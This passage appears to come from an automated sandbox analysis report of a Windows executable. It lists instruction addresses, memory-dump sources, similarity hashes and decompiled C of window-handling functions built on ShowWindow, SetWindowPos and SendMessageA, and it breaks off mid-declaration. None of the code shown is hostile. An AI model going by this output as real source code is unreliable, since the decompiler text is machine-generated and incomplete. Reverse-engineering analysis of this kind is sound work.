                                                                        0x00475b9e
                                                                        0x00475b9f
                                                                        0x00475bc4
                                                                        0x00475bca
                                                                        0x00475bcc
                                                                        0x00475c77
                                                                        0x00475c7d
                                                                        0x00475c7f
                                                                        0x00475c94
                                                                        0x00475c97
                                                                        0x00475c81
                                                                        0x00475c8a
                                                                        0x00475c90
                                                                        0x00475c92
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00475c92
                                                                        0x00475ca7
                                                                        0x00475cad
                                                                        0x00475caf
                                                                        0x00475cb1
                                                                        0x00475cb4
                                                                        0x00475cb4
                                                                        0x00475cb4
                                                                        0x00475cb4
                                                                        0x00475cc1
                                                                        0x00475cc7
                                                                        0x00475cc9
                                                                        0x00475ccb
                                                                        0x00475cce
                                                                        0x00475cce
                                                                        0x00475cce
                                                                        0x00475cce
                                                                        0x00475cdb
                                                                        0x00475ce1
                                                                        0x00475ce3
                                                                        0x00475cec
                                                                        0x00475cec
                                                                        0x00000000
                                                                        0x00475bd2
                                                                        0x00475bdd
                                                                        0x00475bec
                                                                        0x00475c00
                                                                        0x00475c17
                                                                        0x00475c2c
                                                                        0x00475c31
                                                                        0x00475c34
                                                                        0x00475c37
                                                                        0x00475c45
                                                                        0x00475c4c
                                                                        0x00475c4c
                                                                        0x00475ba1
                                                                        0x00475ba1
                                                                        0x00475ba1
                                                                        0x00475ba2
                                                                        0x00475cfe
                                                                        0x00475d04
                                                                        0x00475d06
                                                                        0x00475d16
                                                                        0x00475d16
                                                                        0x00475ba8
                                                                        0x00475ba8
                                                                        0x00475ba8
                                                                        0x00475ba9
                                                                        0x00475d2a
                                                                        0x00475d30
                                                                        0x00475d32
                                                                        0x00475d42
                                                                        0x00475d42
                                                                        0x00475baf
                                                                        0x00475baf
                                                                        0x00475bb0
                                                                        0x00475d56
                                                                        0x00475d5c
                                                                        0x00475d5e
                                                                        0x00475d6e
                                                                        0x00475d6e
                                                                        0x00475d5e
                                                                        0x00475bb0
                                                                        0x00475ba9
                                                                        0x0047619f
                                                                        0x0047619f
                                                                        0x004761a1
                                                                        0x004761a4
                                                                        0x004761a7
                                                                        0x004761ba
                                                                        0x004761ba
                                                                        0x00475b9f
                                                                        0x00475b8a
                                                                        0x00475ab5
                                                                        0x00475ab5
                                                                        0x00475ab5
                                                                        0x00475ab8
                                                                        0x00476675
                                                                        0x00475abe
                                                                        0x00475abe
                                                                        0x00475ac1
                                                                        0x00476669
                                                                        0x00476669
                                                                        0x00475ac1
                                                                        0x00000000
                                                                        0x00475ab8
                                                                        0x00475a83
                                                                        0x00475a83
                                                                        0x00476556
                                                                        0x00476567
                                                                        0x0047656c
                                                                        0x0047656e
                                                                        0x00476577
                                                                        0x00476577
                                                                        0x00475a89
                                                                        0x00475a89
                                                                        0x00475a89
                                                                        0x00475a8c
                                                                        0x00476203
                                                                        0x00476204
                                                                        0x00476207
                                                                        0x0047620d
                                                                        0x00476218
                                                                        0x00476226
                                                                        0x0047622b
                                                                        0x0047622c
                                                                        0x0047622c
                                                                        0x00476231
                                                                        0x00475a92
                                                                        0x00475a92
                                                                        0x00475a92
                                                                        0x00475a93
                                                                        0x004761e9
                                                                        0x00475a99
                                                                        0x00475a99
                                                                        0x00475a99
                                                                        0x00475a9a
                                                                        0x0047652d
                                                                        0x0047653b
                                                                        0x00475aa0
                                                                        0x00475aa0
                                                                        0x00475aa1
                                                                        0x00476586
                                                                        0x00476594
                                                                        0x004765a7
                                                                        0x004765ac
                                                                        0x004765af
                                                                        0x004765b7
                                                                        0x004765b9
                                                                        0x004765bd
                                                                        0x004765bf
                                                                        0x004765c3
                                                                        0x004765e3
                                                                        0x004765e3
                                                                        0x004765e7
                                                                        0x004765e9
                                                                        0x004765ed
                                                                        0x004765ff
                                                                        0x004765ff
                                                                        0x004765ed
                                                                        0x004765c5
                                                                        0x004765c5
                                                                        0x004765c9
                                                                        0x00000000
                                                                        0x004765cb
                                                                        0x004765db
                                                                        0x004765db
                                                                        0x004765c9
                                                                        0x004765c3
                                                                        0x004765bd
                                                                        0x0047660a
                                                                        0x0047660d
                                                                        0x0047660f
                                                                        0x00476611
                                                                        0x00476614
                                                                        0x00476618
                                                                        0x0047661a
                                                                        0x0047661d
                                                                        0x00476621
                                                                        0x0047662e
                                                                        0x0047662e
                                                                        0x00476621
                                                                        0x00476618
                                                                        0x00000000
                                                                        0x00475aa7
                                                                        0x00475aa1
                                                                        0x00475a9a
                                                                        0x00475a93
                                                                        0x00475a8c
                                                                        0x00000000
                                                                        0x00475a83
                                                                        0x00475a19
                                                                        0x00475a19
                                                                        0x00476457
                                                                        0x00476467
                                                                        0x0047646c
                                                                        0x0047646e
                                                                        0x00476473
                                                                        0x00476473
                                                                        0x0047647a
                                                                        0x0047647d
                                                                        0x00476481
                                                                        0x00476494
                                                                        0x00476499
                                                                        0x004764aa
                                                                        0x004764c6
                                                                        0x004764c6
                                                                        0x00475a1f
                                                                        0x00475a1f
                                                                        0x00475a22
                                                                        0x00475a57
                                                                        0x00475a57
                                                                        0x00475a5a
                                                                        0x0047634a
                                                                        0x00475a60
                                                                        0x00475a60
                                                                        0x00475a60
                                                                        0x00475a63
                                                                        0x004761ce
                                                                        0x00475a69
                                                                        0x00475a69
                                                                        0x00475a69
                                                                        0x00475a6a
                                                                        0x00476506
                                                                        0x00476514
                                                                        0x00475a70
                                                                        0x00475a70
                                                                        0x00475a73
                                                                        0x004764d3
                                                                        0x004764d5
                                                                        0x004764d9
                                                                        0x004764df
                                                                        0x004764e3
                                                                        0x004764f3
                                                                        0x004764f3
                                                                        0x004764e3
                                                                        0x004764d9
                                                                        0x00475a73
                                                                        0x00475a6a
                                                                        0x00475a63
                                                                        0x00475a24
                                                                        0x00475a24
                                                                        0x00476440
                                                                        0x00475a2a
                                                                        0x00475a2a
                                                                        0x00475a2f
                                                                        0x00475ad1
                                                                        0x00475ad4
                                                                        0x00475ad7
                                                                        0x00475ae3
                                                                        0x00475aeb
                                                                        0x00475aee
                                                                        0x00475b1b
                                                                        0x00475b23
                                                                        0x00475b26
                                                                        0x00475b3a
                                                                        0x00475b41
                                                                        0x00475b46
                                                                        0x00475b47
                                                                        0x00475b47
                                                                        0x00475af0
                                                                        0x00475afe
                                                                        0x00475b05
                                                                        0x00475b0a
                                                                        0x00475b0b
                                                                        0x00475b0b
                                                                        0x00475aee
                                                                        0x00475a35
                                                                        0x00475a35
                                                                        0x00475a3a
                                                                        0x00476633
                                                                        0x00476636
                                                                        0x0047663e
                                                                        0x0047664d
                                                                        0x00476658
                                                                        0x0047665f
                                                                        0x0047665f
                                                                        0x00475a40
                                                                        0x00475a40
                                                                        0x00475a43
                                                                        0x00476358
                                                                        0x00476362
                                                                        0x00476365
                                                                        0x0047636a
                                                                        0x00476376
                                                                        0x0047637b
                                                                        0x00476382
                                                                        0x00476382
                                                                        0x00476384
                                                                        0x0047638e
                                                                        0x00476386
                                                                        0x00476386
                                                                        0x00476388
                                                                        0x00476393
                                                                        0x00476396
                                                                        0x00476398
                                                                        0x004763a9
                                                                        0x0047639a
                                                                        0x0047639f
                                                                        0x0047639f
                                                                        0x0047638a
                                                                        0x0047638a
                                                                        0x004763b3
                                                                        0x004763b9
                                                                        0x004763bf
                                                                        0x004763bf
                                                                        0x004763c2
                                                                        0x004763cf
                                                                        0x004763c4
                                                                        0x004763c4
                                                                        0x004763c4
                                                                        0x004763c5
                                                                        0x004763d5
                                                                        0x004763c7
                                                                        0x004763c7
                                                                        0x004763c7
                                                                        0x004763c8
                                                                        0x004763db
                                                                        0x004763ca
                                                                        0x004763ca
                                                                        0x004763cb
                                                                        0x004763e1
                                                                        0x004763e1
                                                                        0x004763cb
                                                                        0x004763c8
                                                                        0x004763c5
                                                                        0x004763c2
                                                                        0x0047638a
                                                                        0x00476388
                                                                        0x004763ee
                                                                        0x004763f2
                                                                        0x004763fd
                                                                        0x00476415
                                                                        0x00475a49
                                                                        0x00475a4c
                                                                        0x00476247
                                                                        0x0047624f
                                                                        0x00476252
                                                                        0x00476255
                                                                        0x00476257
                                                                        0x0047625a
                                                                        0x0047625c
                                                                        0x00476272
                                                                        0x0047627a
                                                                        0x0047627d
                                                                        0x0047627f
                                                                        0x004762aa
                                                                        0x00476281
                                                                        0x00476290
                                                                        0x004762a0
                                                                        0x004762a0
                                                                        0x0047625e
                                                                        0x00476268
                                                                        0x00476268
                                                                        0x0047625c
                                                                        0x004762ad
                                                                        0x004762b0
                                                                        0x004762b2
                                                                        0x004762b6
                                                                        0x004762ef
                                                                        0x004762f0
                                                                        0x004762f2
                                                                        0x004762f9
                                                                        0x004762fc
                                                                        0x004762fe
                                                                        0x0047630b
                                                                        0x00476315
                                                                        0x0047631b
                                                                        0x00476323
                                                                        0x00476323
                                                                        0x004762fe
                                                                        0x004762b8
                                                                        0x004762bd
                                                                        0x004762c5
                                                                        0x004762c8
                                                                        0x004762cb
                                                                        0x004762d2
                                                                        0x004762dd
                                                                        0x004762e0
                                                                        0x004762e7
                                                                        0x004762e7
                                                                        0x004762d2
                                                                        0x004762b6
                                                                        0x00476326
                                                                        0x00476329
                                                                        0x00476332
                                                                        0x00476332
                                                                        0x00476329
                                                                        0x00475a4c
                                                                        0x00475a43
                                                                        0x00475a3a
                                                                        0x00475a2f
                                                                        0x00475a24
                                                                        0x00475a22
                                                                        0x0047667c
                                                                        0x0047667e
                                                                        0x00476681
                                                                        0x00476684
                                                                        0x0047668f
                                                                        0x0047669c
                                                                        0x0047669c

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: LongWindow
                                                                        • String ID: $`wG$lkI
                                                                        • API String ID: 1378638983-2299678225
                                                                        • Opcode ID: 338f8f7f42b1aaf73cd1e7ae5260077238943ef14a3e873eb25f55d2ff597f27
                                                                        • Instruction ID: 2bc2a923c6bc387d68c561a48e6f81130dd822a8b8ba7e24570715933eb10461
                                                                        • Opcode Fuzzy Hash: 338f8f7f42b1aaf73cd1e7ae5260077238943ef14a3e873eb25f55d2ff597f27
                                                                        • Instruction Fuzzy Hash: 8F823974A00604DFCB04DF68C589ADAB7F2EF48314F6581A6E8089B366C778EE41DF59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00452974, Relevance: 18.4, APIs: 12, Instructions: 407windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 83%
                                                                        			E00452974(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				intOrPtr _t149;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t160;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				struct HWND__* _t166;
				long _t176;
				signed int _t198;
				signed int _t199;
				long _t220;
				intOrPtr _t226;
				int _t231;
				intOrPtr _t232;
				intOrPtr _t241;
				intOrPtr _t245;
				signed int _t248;
				intOrPtr _t251;
				intOrPtr _t252;
				signed int _t258;
				long _t259;
				intOrPtr _t262;
				intOrPtr _t266;
				signed int _t269;
				intOrPtr _t270;
				intOrPtr _t271;
				signed int _t277;
				long _t278;
				intOrPtr _t281;
				signed int _t286;
				signed int _t287;
				long _t290;
				intOrPtr _t294;
				struct HWND__* _t299;
				signed int _t301;
				signed int _t302;
				signed int _t305;
				signed int _t307;
				long _t308;
				signed int _t311;
				signed int _t313;
				long _t314;
				signed int _t317;
				signed int _t318;
				signed int _t326;
				long _t328;
				intOrPtr _t331;
				intOrPtr _t362;
				long _t370;
				void* _t372;
				void* _t373;
				intOrPtr _t374;

				_t372 = _t373;
				_t374 = _t373 + 0xfffffff8;
				_v12 = 0;
				_v8 = __eax;
				_push(_t372);
				_push(0x452ede);
				_push( *[fs:eax]);
				 *[fs:eax] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2ec) & 0x00000004) != 0) {
					_t294 =  *0x495c40; // 0x41d594
					E00406548(_t294,  &_v12);
					E0040A17C(_v12, 1);
					E00403DA8();
				}
				_t149 =  *0x496c04; // 0x2150d40
				E00456F4C(_t149);
				 *(_v8 + 0x2ec) =  *(_v8 + 0x2ec) | 0x00000004;
				_push(_t372);
				_push(0x452ec1);
				_push( *[fs:edx]);
				 *[fs:edx] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
					_t155 = _v8;
					_t378 =  *((char*)(_t155 + 0x1a6));
					if( *((char*)(_t155 + 0x1a6)) == 0) {
						_push(_t372);
						_push(0x452dc8);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E004037D8(_v8, __eflags);
						 *[fs:eax] = 0;
						_t160 =  *0x496c08; // 0x215094c
						__eflags =  *((intOrPtr*)(_t160 + 0x6c)) - _v8;
						if( *((intOrPtr*)(_t160 + 0x6c)) == _v8) {
							__eflags = 0;
							E00451B60(_v8, 0);
						}
						_t162 = _v8;
						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
						if( *((char*)(_t162 + 0x22f)) != 1) {
							_t163 = _v8;
							__eflags =  *(_t163 + 0x2ec) & 0x00000008;
							if(( *(_t163 + 0x2ec) & 0x00000008) == 0) {
								_t299 = 0;
								_t165 = E0043CC2C(_v8);
								_t166 = GetActiveWindow();
								__eflags = _t165 - _t166;
								if(_t165 == _t166) {
									_t176 = IsIconic(E0043CC2C(_v8));
									__eflags = _t176;
									if(_t176 == 0) {
										_t299 = E0044D7A0(E0043CC2C(_v8));
									}
								}
								__eflags = _t299;
								if(_t299 == 0) {
									ShowWindow(E0043CC2C(_v8), 0);
								} else {
									SetWindowPos(E0043CC2C(_v8), 0, 0, 0, 0, 0, 0x97);
									SetActiveWindow(_t299);
								}
							} else {
								SetWindowPos(E0043CC2C(_v8), 0, 0, 0, 0, 0, 0x97);
							}
						} else {
							E0043A2A8(_v8);
						}
					} else {
						_push(_t372);
						_push(0x452a2c);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E004037D8(_v8, _t378);
						 *[fs:eax] = 0;
						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
							if( *((char*)(_v8 + 0x22f)) != 1) {
								_t301 = E004541A4() -  *(_v8 + 0x48);
								__eflags = _t301;
								_t302 = _t301 >> 1;
								if(_t301 < 0) {
									asm("adc ebx, 0x0");
								}
								_t198 = E00454198() -  *(_v8 + 0x4c);
								__eflags = _t198;
								_t199 = _t198 >> 1;
								if(_t198 < 0) {
									asm("adc eax, 0x0");
								}
							} else {
								_t241 =  *0x496c04; // 0x2150d40
								_t305 = E00435FB0( *((intOrPtr*)(_t241 + 0x44))) -  *(_v8 + 0x48);
								_t302 = _t305 >> 1;
								if(_t305 < 0) {
									asm("adc ebx, 0x0");
								}
								_t245 =  *0x496c04; // 0x2150d40
								_t248 = E00435FF4( *((intOrPtr*)(_t245 + 0x44))) -  *(_v8 + 0x4c);
								_t199 = _t248 >> 1;
								if(_t248 < 0) {
									asm("adc eax, 0x0");
								}
							}
							if(_t302 < 0) {
								_t302 = 0;
							}
							if(_t199 < 0) {
								_t199 = 0;
							}
							_t326 = _t199;
							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
							if( *((char*)(_v8 + 0x57)) != 0) {
								E00450E14(_v8, _t326);
							}
						} else {
							_t251 =  *((intOrPtr*)(_v8 + 0x230));
							__eflags = _t251 + 0xfa - 2;
							if(_t251 + 0xfa - 2 >= 0) {
								__eflags = _t251 - 5;
								if(_t251 == 5) {
									_t252 = _v8;
									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
									if( *((char*)(_t252 + 0x22f)) != 1) {
										_t307 = E004541D4() -  *(_v8 + 0x48);
										__eflags = _t307;
										_t308 = _t307 >> 1;
										if(_t307 < 0) {
											asm("adc ebx, 0x0");
										}
										_t258 = E004541C8() -  *(_v8 + 0x4c);
										__eflags = _t258;
										_t259 = _t258 >> 1;
										if(_t258 < 0) {
											asm("adc eax, 0x0");
										}
									} else {
										_t262 =  *0x496c04; // 0x2150d40
										_t311 = E00435FB0( *((intOrPtr*)(_t262 + 0x44))) -  *(_v8 + 0x48);
										__eflags = _t311;
										_t308 = _t311 >> 1;
										if(_t311 < 0) {
											asm("adc ebx, 0x0");
										}
										_t266 =  *0x496c04; // 0x2150d40
										_t269 = E00435FF4( *((intOrPtr*)(_t266 + 0x44))) -  *(_v8 + 0x4c);
										__eflags = _t269;
										_t259 = _t269 >> 1;
										if(_t269 < 0) {
											asm("adc eax, 0x0");
										}
									}
									__eflags = _t308;
									if(_t308 < 0) {
										_t308 = 0;
										__eflags = 0;
									}
									__eflags = _t259;
									if(_t259 < 0) {
										_t259 = 0;
										__eflags = 0;
									}
									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								}
							} else {
								_t270 =  *0x496c04; // 0x2150d40
								_t370 =  *(_t270 + 0x44);
								_t271 = _v8;
								__eflags =  *((char*)(_t271 + 0x230)) - 7;
								if( *((char*)(_t271 + 0x230)) == 7) {
									_t362 =  *0x44c130; // 0x44c17c
									_t290 = E00403768( *(_v8 + 4), _t362);
									__eflags = _t290;
									if(_t290 != 0) {
										_t370 =  *(_v8 + 4);
									}
								}
								__eflags = _t370;
								if(_t370 == 0) {
									_t313 = E004541A4() -  *(_v8 + 0x48);
									__eflags = _t313;
									_t314 = _t313 >> 1;
									if(_t313 < 0) {
										asm("adc ebx, 0x0");
									}
									_t277 = E00454198() -  *(_v8 + 0x4c);
									__eflags = _t277;
									_t278 = _t277 >> 1;
									if(_t277 < 0) {
										asm("adc eax, 0x0");
									}
								} else {
									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
									__eflags = _t317;
									_t318 = _t317 >> 1;
									if(_t317 < 0) {
										asm("adc ebx, 0x0");
									}
									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
									__eflags = _t286;
									_t287 = _t286 >> 1;
									if(_t286 < 0) {
										asm("adc eax, 0x0");
									}
									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
								}
								__eflags = _t314;
								if(_t314 < 0) {
									_t314 = 0;
									__eflags = 0;
								}
								__eflags = _t278;
								if(_t278 < 0) {
									_t278 = 0;
									__eflags = 0;
								}
								_t328 = _t278;
								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								_t281 = _v8;
								__eflags =  *((char*)(_t281 + 0x57));
								if( *((char*)(_t281 + 0x57)) != 0) {
									E00450E14(_v8, _t328);
								}
							}
						}
						 *((char*)(_v8 + 0x230)) = 0;
						if( *((char*)(_v8 + 0x22f)) != 1) {
							ShowWindow(E0043CC2C(_v8),  *(0x47ab74 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
						} else {
							if( *(_v8 + 0x22b) != 2) {
								ShowWindow(E0043CC2C(_v8),  *(0x47ab74 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
								__eflags = _t220;
								CallWindowProcA(0x406d84, E0043CC2C(_v8), 5, 0, _t220);
								E0043680C();
							} else {
								_t231 = E0043CC2C(_v8);
								_t232 =  *0x496c04; // 0x2150d40
								SendMessageA( *( *((intOrPtr*)(_t232 + 0x44)) + 0x254), 0x223, _t231, 0);
								ShowWindow(E0043CC2C(_v8), 3);
							}
							_t226 =  *0x496c04; // 0x2150d40
							SendMessageA( *( *((intOrPtr*)(_t226 + 0x44)) + 0x254), 0x234, 0, 0);
						}
					}
				}
				_pop(_t331);
				 *[fs:eax] = _t331;
				_push(0x452ec8);
				_t154 = _v8;
				 *(_t154 + 0x2ec) =  *(_t154 + 0x2ec) & 0x000000fb;
				return _t154;
			}


























































                                                                        0x00452975
                                                                        0x00452977
                                                                        0x0045297f
                                                                        0x00452982
                                                                        0x00452987
                                                                        0x00452988
                                                                        0x0045298d
                                                                        0x00452990
                                                                        0x0045299a
                                                                        0x004529ab
                                                                        0x004529b0
                                                                        0x004529bf
                                                                        0x004529c4
                                                                        0x004529c4
                                                                        0x004529c9
                                                                        0x004529ce
                                                                        0x004529d6
                                                                        0x004529df
                                                                        0x004529e0
                                                                        0x004529e5
                                                                        0x004529e8
                                                                        0x004529f2
                                                                        0x004529f8
                                                                        0x004529fb
                                                                        0x00452a02
                                                                        0x00452da6
                                                                        0x00452da7
                                                                        0x00452dac
                                                                        0x00452daf
                                                                        0x00452db9
                                                                        0x00452dc3
                                                                        0x00452ddf
                                                                        0x00452de7
                                                                        0x00452dea
                                                                        0x00452dec
                                                                        0x00452df1
                                                                        0x00452df1
                                                                        0x00452df6
                                                                        0x00452df9
                                                                        0x00452e00
                                                                        0x00452e0f
                                                                        0x00452e12
                                                                        0x00452e19
                                                                        0x00452e3a
                                                                        0x00452e3f
                                                                        0x00452e46
                                                                        0x00452e4b
                                                                        0x00452e4d
                                                                        0x00452e58
                                                                        0x00452e5d
                                                                        0x00452e5f
                                                                        0x00452e6e
                                                                        0x00452e6e
                                                                        0x00452e5f
                                                                        0x00452e70
                                                                        0x00452e72
                                                                        0x00452ea4
                                                                        0x00452e74
                                                                        0x00452e8c
                                                                        0x00452e92
                                                                        0x00452e92
                                                                        0x00452e1b
                                                                        0x00452e33
                                                                        0x00452e33
                                                                        0x00452e02
                                                                        0x00452e05
                                                                        0x00452e05
                                                                        0x00452a08
                                                                        0x00452a0a
                                                                        0x00452a0b
                                                                        0x00452a10
                                                                        0x00452a13
                                                                        0x00452a1d
                                                                        0x00452a27
                                                                        0x00452a4d
                                                                        0x00452a79
                                                                        0x00452ac2
                                                                        0x00452ac2
                                                                        0x00452ac5
                                                                        0x00452ac7
                                                                        0x00452ac9
                                                                        0x00452ac9
                                                                        0x00452ad9
                                                                        0x00452ad9
                                                                        0x00452adc
                                                                        0x00452ade
                                                                        0x00452ae0
                                                                        0x00452ae0
                                                                        0x00452a7b
                                                                        0x00452a7b
                                                                        0x00452a8d
                                                                        0x00452a90
                                                                        0x00452a92
                                                                        0x00452a94
                                                                        0x00452a94
                                                                        0x00452a97
                                                                        0x00452aa7
                                                                        0x00452aaa
                                                                        0x00452aac
                                                                        0x00452aae
                                                                        0x00452aae
                                                                        0x00452aac
                                                                        0x00452ae5
                                                                        0x00452ae7
                                                                        0x00452ae7
                                                                        0x00452aeb
                                                                        0x00452aed
                                                                        0x00452aed
                                                                        0x00452afd
                                                                        0x00452b06
                                                                        0x00452b13
                                                                        0x00452b1c
                                                                        0x00452b1c
                                                                        0x00452b26
                                                                        0x00452b29
                                                                        0x00452b34
                                                                        0x00452b37
                                                                        0x00452c0b
                                                                        0x00452c0d
                                                                        0x00452c13
                                                                        0x00452c16
                                                                        0x00452c1d
                                                                        0x00452c66
                                                                        0x00452c66
                                                                        0x00452c69
                                                                        0x00452c6b
                                                                        0x00452c6d
                                                                        0x00452c6d
                                                                        0x00452c7d
                                                                        0x00452c7d
                                                                        0x00452c80
                                                                        0x00452c82
                                                                        0x00452c84
                                                                        0x00452c84
                                                                        0x00452c1f
                                                                        0x00452c1f
                                                                        0x00452c31
                                                                        0x00452c31
                                                                        0x00452c34
                                                                        0x00452c36
                                                                        0x00452c38
                                                                        0x00452c38
                                                                        0x00452c3b
                                                                        0x00452c4b
                                                                        0x00452c4b
                                                                        0x00452c4e
                                                                        0x00452c50
                                                                        0x00452c52
                                                                        0x00452c52
                                                                        0x00452c50
                                                                        0x00452c87
                                                                        0x00452c89
                                                                        0x00452c8b
                                                                        0x00452c8b
                                                                        0x00452c8b
                                                                        0x00452c8d
                                                                        0x00452c8f
                                                                        0x00452c91
                                                                        0x00452c91
                                                                        0x00452c91
                                                                        0x00452caa
                                                                        0x00452caa
                                                                        0x00452b3d
                                                                        0x00452b3d
                                                                        0x00452b42
                                                                        0x00452b45
                                                                        0x00452b48
                                                                        0x00452b4f
                                                                        0x00452b57
                                                                        0x00452b5d
                                                                        0x00452b62
                                                                        0x00452b64
                                                                        0x00452b69
                                                                        0x00452b69
                                                                        0x00452b64
                                                                        0x00452b6c
                                                                        0x00452b6e
                                                                        0x00452ba7
                                                                        0x00452ba7
                                                                        0x00452baa
                                                                        0x00452bac
                                                                        0x00452bae
                                                                        0x00452bae
                                                                        0x00452bbe
                                                                        0x00452bbe
                                                                        0x00452bc1
                                                                        0x00452bc3
                                                                        0x00452bc5
                                                                        0x00452bc5
                                                                        0x00452b70
                                                                        0x00452b76
                                                                        0x00452b76
                                                                        0x00452b79
                                                                        0x00452b7b
                                                                        0x00452b7d
                                                                        0x00452b7d
                                                                        0x00452b80
                                                                        0x00452b89
                                                                        0x00452b89
                                                                        0x00452b8c
                                                                        0x00452b8e
                                                                        0x00452b90
                                                                        0x00452b90
                                                                        0x00452b93
                                                                        0x00452b93
                                                                        0x00452bc8
                                                                        0x00452bca
                                                                        0x00452bcc
                                                                        0x00452bcc
                                                                        0x00452bcc
                                                                        0x00452bce
                                                                        0x00452bd0
                                                                        0x00452bd2
                                                                        0x00452bd2
                                                                        0x00452bd2
                                                                        0x00452be2
                                                                        0x00452beb
                                                                        0x00452bf1
                                                                        0x00452bf4
                                                                        0x00452bf8
                                                                        0x00452c01
                                                                        0x00452c01
                                                                        0x00452bf8
                                                                        0x00452b37
                                                                        0x00452cb3
                                                                        0x00452cc4
                                                                        0x00452d9a
                                                                        0x00452cca
                                                                        0x00452cd4
                                                                        0x00452d27
                                                                        0x00452d3b
                                                                        0x00452d3b
                                                                        0x00452d50
                                                                        0x00452d58
                                                                        0x00452cd6
                                                                        0x00452cdb
                                                                        0x00452ce6
                                                                        0x00452cf5
                                                                        0x00452d05
                                                                        0x00452d05
                                                                        0x00452d66
                                                                        0x00452d75
                                                                        0x00452d75
                                                                        0x00452cc4
                                                                        0x00452a02
                                                                        0x00452eab
                                                                        0x00452eae
                                                                        0x00452eb1
                                                                        0x00452eb6
                                                                        0x00452eb9
                                                                        0x00452ec0

                                                                        APIs
                                                                        • SendMessageA.USER32 ref: 00452CF5
                                                                          • Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: LoadMessageSendString
                                                                        • String ID:
                                                                        • API String ID: 1946433856-0
                                                                        • Opcode ID: 717acc6c25fd58546519ffb373e4bf667c7c6554064bb9ea9fc5b4701ab0a2bc
                                                                        • Instruction ID: d82fd93d8c37f43bf0d08f362bbfae17662a6fc41c918366e4d92ba17f68ed98
                                                                        • Opcode Fuzzy Hash: 717acc6c25fd58546519ffb373e4bf667c7c6554064bb9ea9fc5b4701ab0a2bc
                                                                        • Instruction Fuzzy Hash: C9F16130A00204EFDB01DFA9CA85B5E77F5AB09305F2540B6E904AB363D779EE45DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0046F74C, Relevance: 18.2, APIs: 9, Strings: 1, Instructions: 727COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 91%
                                                                        			E0046F74C(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				char _v21;
				char _v22;
				short _v24;
				short _v26;
				void* _v42;
				intOrPtr _v78;
				char _v82;
				struct tagLOGFONTA _v142;
				char _v148;
				char _v156;
				intOrPtr _t339;
				signed int _t352;
				signed int _t365;
				intOrPtr _t366;
				intOrPtr _t371;
				signed int _t373;
				intOrPtr _t378;
				intOrPtr _t381;
				intOrPtr _t382;
				signed int _t396;
				intOrPtr _t405;
				intOrPtr _t407;
				intOrPtr _t416;
				signed int _t428;
				signed int _t430;
				signed int _t438;
				signed int _t440;
				signed int _t446;
				signed int _t454;
				signed int _t456;
				signed int _t458;
				intOrPtr _t459;
				signed int _t461;
				signed int _t463;
				intOrPtr _t465;
				signed int _t467;
				signed int _t486;
				signed int _t488;
				signed int _t491;
				signed int _t493;
				signed int _t498;
				intOrPtr _t504;
				long _t506;
				int _t508;
				void* _t520;
				signed int _t531;
				void* _t548;
				intOrPtr _t552;
				signed int _t566;
				signed int _t569;
				intOrPtr _t577;
				intOrPtr _t586;
				intOrPtr _t589;
				signed int _t595;
				intOrPtr _t597;
				signed int _t611;
				intOrPtr _t615;
				intOrPtr _t631;
